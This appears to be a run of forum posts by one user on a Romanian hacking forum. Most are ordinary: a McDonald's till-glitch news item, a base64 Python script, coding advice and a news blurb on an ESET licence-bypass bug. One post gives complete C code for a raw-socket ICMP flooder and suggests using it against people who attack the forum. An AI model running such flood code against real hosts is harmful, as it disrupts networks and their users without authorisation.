MrGrj

7

Uite cam ce poti face.

Viral Facebook post shows how buyers can get meals at half the price from McDonald’s Self-Serving exploiting a system glitch Customers in Australia were treated to a 50% discount meal due to a glitch in the self-service system at a McDonald’s unit. The fault could be made full use of straight from the menu option. Had someone not posted a video on Facebook explaining the steps to get the price cut, probably McDonald’s would have taken some time to find the fault. Max Jalal shared the mobile phone footage showing how he and his group of friends get a family value Dinner Box that usually costs $19.95 / €17.50 for just $9.95 / €8.80 by doing nothing but using the self-serve tills. Jalal suggests going with the option to pay at the counter instead of the machine, in order to keep the employees unaware of the trick. Max Jalal selects a $20 dinner box, then his friend doing the filming, is heard saying: “This is the best bit, watch this.” He then selects an L and P option from the drinks menu and adds it to his bill, but it reduces the total price down to $17.20. He then repeats this step three more times until the total is reduced to less than half. The option is easy to locate as it shows no image of a product or price. Jalal’s bill was half the original value after repeating this step four times. It seemed like like the glitch could not be exploited further than this. The video clip was shot in a branch of the fast-food retailer in Melbourne, Australia. As expected, the Facebook post went viral and managed to garner a lot of attention. The video clip was viewed by more than 1.5 million people after it was posted to Facebook and shared. Self-service systems have been available in other parts of the world for years, but it is not clear if this process has the same effect on them too. The machine at the respective location has been fixed by McDonald’s Australia and the machine should now work as it is meant to be. It looks apparently that this was an exceptional case. A McDonald’s spokesman speaking to Daily Mail Australia said: “It is a new computer system and the nature of computer systems mean sometimes glitches can happen.” He added he was “fairly confident” there weren’t any other faults in the system that would let people to reduce the price of their meal. Source

Pare interesant. Cred ca merita urmarit. Misto traillerul. A ramas ala cu gura cascata

Da, typo. Thanks @alecseu teoretic asta era ideea sa fac fara nici un import dar arata urat eroarea aia daca bagai un string aiurea

Un programel simplu facut in pauza de masa. Enjoy: __author__ = "MrGrj" import binascii def bas64decryption(): encoded_string = raw_input("Please insert the base64 encrypted text:") decoded_string = encoded_string.decode('base64') if encoded_string is None: print 'You inserted a null string. Please enter a valid string next time !' else: print 'Your decoded string:' + ' ' + decoded_string def base64encryption(): decoded_string = raw_input("Please insert the text that you want to encode:") encoded_string = decoded_string.encode('base64') if decoded_string is None: print 'You inserted a null string. Please enter a valid string next time !' else: print 'Your encoded string:' + ' ' + encoded_string if __name__ == "__main__": menu = {} menu['1'] = "Base 64 decryption." menu['2'] = "Base 64 encryption." menu['3'] = "Exit." while True: options = menu.keys() options.sort() for entry in options: print entry, menu[entry] selection = raw_input("What would you like to do? ") if selection == "1": try: bas64decryption() except binascii.Error: print "This is not a base64 encoded string!" elif selection == "2": try: base64encryption() except binascii.Error: print "Something went wrong! Please try again" elif selection == "3": print "Bye-bye" break else: print "This is not a valid choice !" O sa revin cu update-uri in topicul asta cu alte functii de decoding / encoding. Apoi, cu restul membrilor care stiu python sa facem ceva misto, optimizat, etc. Asta daca se vrea si eu timp. @MasterLight

Nu vreau de la 0. Puteti folosi orice 3rd party aveti nevoie. //EDIT: eu nu am timp sa ma ocup + ca eu zic ca e o suma decenta.

Am nevoie de cineva care stie perl si ma poate ajuta cu un mic script in schimbul sumei de 50$. Plata pe Paypal dupa ce verific scriptul. Detalii: pana acum, scriptul citeste niste URL-uri (toate sunt link-uri catre poze) dintr-un fisier. va exista o variabila @images si voi folosi foreach(@images){} pentru a parcurge fiecare imagine din array. Explicatie: Pentru fiecare imagine vreau sa verific: daca exista text in ea sau nu sa aflu daca textul contine doar numere / simboluri sa verific cu un regex daca un string se afla in textul respectiv CONDITII: daca exista text in poza -> retunam textul. Daca nu exista, returnam FALSE daca textul contine doar cifre / simboluri -> returnam TRUE . In oricare alta situatie returnam FALSE daca in text nu exista stringul din conditia pusa in regex, returnam TRUE. Daca exista, returnam FALSE Deci practic, pentru fiecare iteratie se va intampla cam asa: foreach (@images) { # verificare daca exista text in poza si returneaza acel text daca exista # textul din imagine poate contine caractere din limba chineza/japoneza $url = $_; $string = &imageCheck($url); $valid = &textCheck($string); if ($valid) { print "Valid: "; } else { print "Invalid: "; } print "$string / $url\n"; } sub imageCheck { # aici vreau sa se verifice daca textul gasit in poza contine DOAR numere si simboluri (ex: 21/02/2014 sau 3*30%) # daca URL-ul imaginii nu exista sau link-ul # ne da access forbidden, returneaza string value "404" sau "403" } sub textCheck { # aici se face o verificare. Daca text-ul nu se potriveste cu un regex,, returneaza TRUE }

Nu, dar pot sa iti explic altceva : Uite rezultatul primei solutii gasite de tine: Uite si la a doua: Daca nu ai ascultat nimeni sfatul lui @Erase - valoarea tre' sa fie exact 66. Credeam ca se intelege destul de clar din cerinta. Primele sunt false deci nu ai cum sa imi spui ca solutiile tale sunt adevarate. Ia in considerare asta si adauga niste conditii.

Afla timpul a 10 rulari @Byte-ul si posteaza aici. Nu am timp acum sa verific C++. Python mi-a fost la-ndemana ca-l folosesc la munca.

Corect

Se da urmatoarea poza: Se cer: CONDITII: - postati aici codul + print cu timpul de rulare al programului si cele 10 combinatii cerute mai sus. Castiga cel care reuseste sa genereze 10 combinatii corecte care sa se potriveasca pattern-ului din poza + complexitate cat mai mica + run-time cat mai mic. Bafta ! SOLVERS: - @shaggi - (solutie bruteforce / PHP - timp de executie ~ 0.0072510242462)

Aparent uiti, din moment ce se specifica acolo clar sa nu mai faci double-post aiurea ci sa iti editezi post-ul precedent. Bine ai venit. Citeste cu grija regulile alea.

Iegzact. Du-te oriunde. Tu tine-te de invatat ca restu' vine de la sine. Usor usor o sa realizezi ca tot singur o sa te chinui si ca tu o sa fii singurul tau profesor real. Fa-ti un cont pe github si orice proiect mai insemnat pune-l acolo( nu ma refer la o parcurgere a unui vector sau creearea unei liste circulare ). Bafta.

Nu cred ca vindea cineva un asemenea exploit cu 200e si nu stiu unde ai vazut tu un asemenea post. Pe undernet poate gasesti, dar pe forumuri daca gasesti asa ceva e ori teapa, ori honeypot. Si poate @Byte-ul a exagerat putin insa peste 5k Euro tot tre' sa ai pt asa ceva. Ai grija.

Perfect de acord. Invatati algoritmi -> alegeti un limbaj (oricare - poti face multe chiar daca stii doar bash) -> aplicati algoritmii in limbajul ales -> descoperiti singuri ce si cum functioneaza in acel limbaj -> imagination is the limit

Acest mic programel este scris strict pentru a invata cum sa folosim socket-uri si ICMP ( "echo" requests ). E treaba voastra ce si cum il folositi si o faceti pe propia raspundere. Despre Ping si ICMP: Ping = un instrument de re?ea folosit pentru a verifica dac? un anumit calculator poate fi accesat prin intermediul unei re?ele de tip IP. Ping trimte mesaje ICMP “echo request” (în române?te solicitare de r?spuns) prin pachete adresate host-ului vizat ?i a?teapt? r?spunsul la aceste mesaje venite sub form? de r?spunsuri ICMP “echo response” de la hostul destina?ie. Transmi?ând periodic astfel de pachete ?i calculând întârzierea cu care ajung r?spunsurile, ping estimeaz? timpul de round-trip, precum ?i rata de pierdere a pachetelor dintre host-uri. Codul pe care urmeaza sa il parcurgem trimite pachete in masa ( flood pe romaneste ) asa ca va repet: folositi pe propia raspundere. Ca urmare a flood-urilor primite de RST m-am gandit ca poate vreti sa folositi asta pe propia raspundere impotriva celor care "arunca cu cacat" de plictiseala. Urmarind thread-ul asta am zis ca poate vreti si nu stiti cum Internet Control Message Protocol (abreviat ICMP) = un protocol din suita TCP/IP care folose?te la semnalizarea ?i diagnosticarea problemelor din re?ea. Protocolul este definit in RFC792. Mesajele ICMP sunt încapsulate în interiorul pachetelor IP. Versiunea ICMP ptr IPv4 este adesea cunoscuta ca ICMPv4; in schimb IPv6 dispune de un protocol similar cunoscut sub abrevierea ICMPv6. Probabil cele mai utilizate programe care se bazeaz? pe ICMP sunt ping ?i traceroute. Mai jos am comentat liniile ce mi s-au parut esentiale. In rest, ce nu stiti, google is your friend (asta daca vreti sa stiti). Let's purcedem into the cod: #include "stdio.h" #include "winsock2.h" #include "conio.h" #include "stdint.h" #pragma comment(lib,"ws2_32.lib") //libraria winsock 2.2 #define ICMP_ECHO 8 /* Echo Request - cel explicat in definitia de la ping */ unsigned short in_cksum(unsigned short *ptr, int nbytes); typedef uint8_t u_int8_t; typedef uint16_t u_int16_t; typedef uint32_t u_int32_t; struct icmphdr { u_int8_t type; /* tipul mesajului */ u_int8_t code; /* tip cod */ u_int16_t checksum; union { struct { u_int16_t id; u_int16_t sequence; } echo; /* dam echo la datagram */ u_int32_t gateway; /* addresa gateway */ struct { u_int16_t __unused; u_int16_t mtu; } frag; /* path mtu discovery */ } un; }; int main(int argc, char *argv[]) { char *packet, *data=NULL; SOCKET s; int k = 1, packet_size, payload_size = 512, sent = 0; struct iphdr *iph = NULL; struct icmphdr *icmph = NULL; struct sockaddr_in dest; //Initializare winsock WSADATA wsock; printf("\nInitializare winsock..."); if (WSAStartup(MAKEWORD(2,2),&wsock) != 0) { fprintf(stderr,"WSAStartup() failed"); exit(EXIT_FAILURE); } printf("Terminat !"); //Acum creeam pachetele ICMP if((s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == SOCKET_ERROR) { printf("Eroare la creearea pachetelor raw-icmp"); exit(EXIT_FAILURE); } dest.sin_family = AF_INET; dest.sin_addr.s_addr = inet_addr("1.2.3.4"); packet_size = sizeof(struct icmphdr) + payload_size; packet = (char * )malloc(packet_size); //zero out the packet buffer memset (packet, 0, packet_size); icmph = (struct icmphdr*) packet; icmph->type = ICMP_ECHO; icmph->code = 0; icmph->un.echo.sequence = rand(); icmph->un.echo.id = rand(); // initializam payload-ul TCP cu cacaturi data = packet + sizeof(struct icmphdr); memset(data, '^', payload_size); //suma de control icmph->checksum = 0; icmph->checksum = in_cksum((unsigned short *)icmph, packet_size); printf("\nTrimitem pachetele...\n"); while(1) { if(sendto(s , packet , packet_size , 0 , (struct sockaddr *)&dest, sizeof(dest)) == SOCKET_ERROR ) { printf("Eroare la trimiterea pachetelor : %d" , WSAGetLastError()); break; } printf("%d Pachetele au fost trimise cu succes\r" , ++sent); _getch(); } return 0; } /* Functie pt a calcula suma de control( calculata în func?ie de câmpurile antet ICMP + sir de date ) */ unsigned short in_cksum(unsigned short *ptr, int nbytes) { register long sum; u_short oddbyte; register u_short answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *) & oddbyte) = *(u_char *) ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } Sursa de mai sus poate fi compilata in visual studio. Creeati un nou proiect, compilati si verificati cu ajutorul unui sniffer de retea (ex: wireshark) daca pachetele ICMP au fost trimise cu succes. Codul de mai sus este un ciot si tre' tratat ca atare. Nu mi-am batut gura cu prea multe chestii teoretice pentru ca oricum 95% vor da copy-paste si vor rupe flood-ul in 15. Sper sa va fie de folos si sa invatati ceva util din el.

Security Researcher discovers Vulnerability in ESET Nod32 Antivirus License authentication system which generates free license (username and password) With so many worms and trojans out in the open, every computer user would like to have an Antivirus on board his/her PC but it would be really nice to have a paid version of an Antivirus for free. No this is not a giveaway but a researcher has discovered a serious vulnerability in the ESET Nod32 licensed version which allows hackers to use it for a full year without paying. Security researcher, Mohamed Abdelbaset Elnoby has discovered a vulnerability in ESET Nod32 licensed version authentication that allows potential hackers generate millions of usernames and passwords without a hitch. Elnoby has dubbed the authentication bug as “hilarious” and he states that, “Hilarious Broken Authentication bug I found in ESET website specifically in their “Antivirus Product Activation Process” that allowed me to generate millions of valid paid Licenses of “ESET Nod32 Antivirus” as per their description “Our award-winning security software offers the most effective protection available today” for free. ” The exploit of generating unlimited usernames and passwords for ESET Nod32 is caused due to broken authentication bug. While most applications require authentication to gain access to private information or to execute tasks, not every authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of security threats often result in authentication schemes that can be bypassed by simply skipping the login page and directly calling an internal page that is supposed to be accessed only after authentication has been performed. Elnoby discovered that there are several ways of bypassing the ESET Nod32 authentication like : Direct page request (forced browsing) Parameter modification Session ID prediction SQL injection The PoC of the bug is given below : Sursa surselor

Fizica e usoara. In afara de chimia anorganica, mi se pare cea mai usoara alegere. Nu-ti ia mai mult de doua luni sa inveti de-un 6-7 //EDIT: Citeste asta pentru detalii. Nu cred ca s-a schimbat din 2011 pana acum

In cazul in care conducerea liceului a trimis lista finala / oficiala cu materiile, nu mai are ce sa faca. Cam tarziu s-a trezit "prietenul tau". Estem in Mai.

@Byte-ul uite aici un video foarte misto, in caz ca te mai intereseaza. Am vazut recent video-ul si m-am gandit la post-ul tau:

Nu citesc acest thread

Pentru cine e interesat, de mentionat mai este faptul ca de multe ori, scrii mai mult cod pentru Mock Tests decat cod pentru aplicatie in sine.

@bubbles Iti pot face ceva de genu' pentru 15$.

Adica ai de facut o baza de date care sa gestioneaze angajatii si pacientii dintr-un spital, nu ? Poti lua orice alta aplicatie de baza de date relationala si sa o adaptezi nevoilor tale.